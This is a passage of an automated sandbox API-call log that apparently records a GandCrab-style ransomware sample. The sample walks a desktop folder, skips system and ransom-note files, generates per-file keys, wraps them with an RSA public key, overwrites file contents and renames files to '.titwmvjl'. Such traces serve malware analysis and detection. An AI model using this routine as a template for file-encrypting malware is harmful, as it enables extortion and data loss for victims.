(lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\binhcrzS3ARBF.pdf") returned 78 [0088.687] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\binhcrzS3ARBF.pdf") returned 78 [0088.687] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="desktop.ini") returned -1 [0088.687] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="autorun.inf") returned 1 [0088.688] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="ntuser.dat") returned -1 [0088.688] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="iconcache.db") returned -1 [0088.688] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="bootsect.bak") returned -1 [0088.688] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="boot.ini") returned -1 [0088.688] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="ntuser.dat.log") returned -1 [0088.688] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="thumbs.db") returned -1 [0088.688] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.688] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.688] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="KRAB-DECRYPT.html") returned -1 [0088.688] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="CRAB-DECRYPT.html") returned -1 [0088.688] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.688] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="CRAB-DECRYPT.txt") returned -1 [0088.688] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="ntldr") returned -1 [0088.688] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="NTDETECT.COM") returned -1 [0088.688] lstrcmpiW (lpString1="binhcrzS3ARBF.pdf", lpString2="Bootfont.bin") returned -1 [0088.688] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\binhcrzS3ARBF.pdf") returned 78 [0088.688] lstrlenW (lpString=".pdf") returned 4 [0088.688] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.688] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".pdf ") returned 5 [0088.688] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.688] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.689] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\binhcrzS3ARBF.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\binhcrzs3arbf.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0088.689] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.689] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0088.689] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.690] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.690] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.691] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.691] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.691] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.691] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0088.691] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.691] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.691] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.692] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.692] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.693] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.693] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.693] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.693] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0088.693] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.693] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.693] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.694] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.694] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.695] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.695] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503478) returned 1 [0088.695] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.696] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.696] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.696] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.696] GetLastError () returned 0x0 [0088.696] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.696] CryptDestroyKey (hKey=0x503478) returned 1 [0088.696] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.696] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.696] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.696] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.697] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.698] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5032f8) returned 1 [0088.698] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.698] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.698] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.698] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.698] GetLastError () returned 0x0 [0088.698] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.698] CryptDestroyKey (hKey=0x5032f8) returned 1 [0088.698] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.699] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.699] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.699] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.699] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x156a7, lpOverlapped=0x0) returned 1 [0088.706] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffea959, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.706] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x156a7, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x156a7, lpOverlapped=0x0) returned 1 [0088.709] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.709] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0088.710] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.714] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.714] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.714] CloseHandle (hObject=0x2c4) returned 1 [0088.715] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\binhcrzS3ARBF.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\binhcrzs3arbf.pdf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\binhcrzS3ARBF.pdf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\binhcrzs3arbf.pdf.titwmvjl"), dwFlags=0x1) returned 1 [0088.715] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.715] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0088.715] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0088.715] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0088.716] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\d2ca4a09d2ca4deb61a.lock" [0088.716] lstrlenW (lpString=".titwmvjl") returned 9 [0088.716] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\d2ca4a09d2ca4deb61a.lock") returned 85 [0088.716] VirtualAlloc (lpAddress=0x0, dwSize=0xea, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.716] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 94 [0088.716] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\d2ca4a09d2ca4deb61a.lock") returned 85 [0088.716] lstrlenW (lpString=".lock") returned 5 [0088.716] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.716] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0088.716] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.716] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.716] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0088.717] lstrcmpW (lpString1="frzRNZlwLH3r.bmp", lpString2=".") returned 1 [0088.717] lstrcmpW (lpString1="frzRNZlwLH3r.bmp", lpString2="..") returned 1 [0088.717] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\", lpString2="frzRNZlwLH3r.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\frzRNZlwLH3r.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\frzRNZlwLH3r.bmp" [0088.717] lstrlenW (lpString=".titwmvjl") returned 9 [0088.717] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\frzRNZlwLH3r.bmp") returned 77 [0088.717] VirtualAlloc (lpAddress=0x0, dwSize=0xda, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.717] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\frzRNZlwLH3r.bmp.titwmvjl") returned 86 [0088.717] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\frzRNZlwLH3r.bmp") returned 77 [0088.717] lstrlenW (lpString=".bmp") returned 4 [0088.717] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.717] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".bmp ") returned 5 [0088.717] lstrcmpiW (lpString1=".bmp", lpString2=".titwmvjl") returned -1 [0088.717] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.717] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\frzRNZlwLH3r.bmp") returned 77 [0088.717] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\frzRNZlwLH3r.bmp") returned 77 [0088.717] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="desktop.ini") returned 1 [0088.717] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="autorun.inf") returned 1 [0088.717] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="ntuser.dat") returned -1 [0088.717] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="iconcache.db") returned -1 [0088.717] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="bootsect.bak") returned 1 [0088.717] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="boot.ini") returned 1 [0088.717] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="ntuser.dat.log") returned -1 [0088.717] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="thumbs.db") returned -1 [0088.718] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.718] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.718] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0088.718] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="CRAB-DECRYPT.html") returned 1 [0088.718] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.718] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.718] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="ntldr") returned -1 [0088.718] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="NTDETECT.COM") returned -1 [0088.718] lstrcmpiW (lpString1="frzRNZlwLH3r.bmp", lpString2="Bootfont.bin") returned 1 [0088.718] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\frzRNZlwLH3r.bmp") returned 77 [0088.718] lstrlenW (lpString=".bmp") returned 4 [0088.718] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.718] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".bmp ") returned 5 [0088.718] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.718] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.718] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\frzRNZlwLH3r.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\frzrnzlwlh3r.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0088.719] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.719] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0088.719] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.719] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.719] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.721] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.721] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.721] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.721] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0088.721] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.721] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.721] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.721] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.722] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.723] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.723] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.723] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.723] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0088.723] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.723] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.723] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.723] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.723] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.725] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503978) returned 1 [0088.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.725] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.725] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.725] GetLastError () returned 0x0 [0088.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.726] CryptDestroyKey (hKey=0x503978) returned 1 [0088.726] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.726] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.726] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.726] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.727] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.727] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503938) returned 1 [0088.727] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.727] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.727] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.727] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.728] GetLastError () returned 0x0 [0088.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.728] CryptDestroyKey (hKey=0x503938) returned 1 [0088.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.728] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.728] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.728] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.728] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x3756, lpOverlapped=0x0) returned 1 [0088.734] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffffc8aa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.735] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3756, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x3756, lpOverlapped=0x0) returned 1 [0088.736] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.736] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0088.738] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.741] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.742] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.742] CloseHandle (hObject=0x2c4) returned 1 [0088.742] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\frzRNZlwLH3r.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\frzrnzlwlh3r.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\frzRNZlwLH3r.bmp.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\frzrnzlwlh3r.bmp.titwmvjl"), dwFlags=0x1) returned 1 [0088.743] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.743] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0088.743] lstrcmpW (lpString1="HXpQea.avi", lpString2=".") returned 1 [0088.743] lstrcmpW (lpString1="HXpQea.avi", lpString2="..") returned 1 [0088.743] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\", lpString2="HXpQea.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\HXpQea.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\HXpQea.avi" [0088.743] lstrlenW (lpString=".titwmvjl") returned 9 [0088.743] lstrlenW 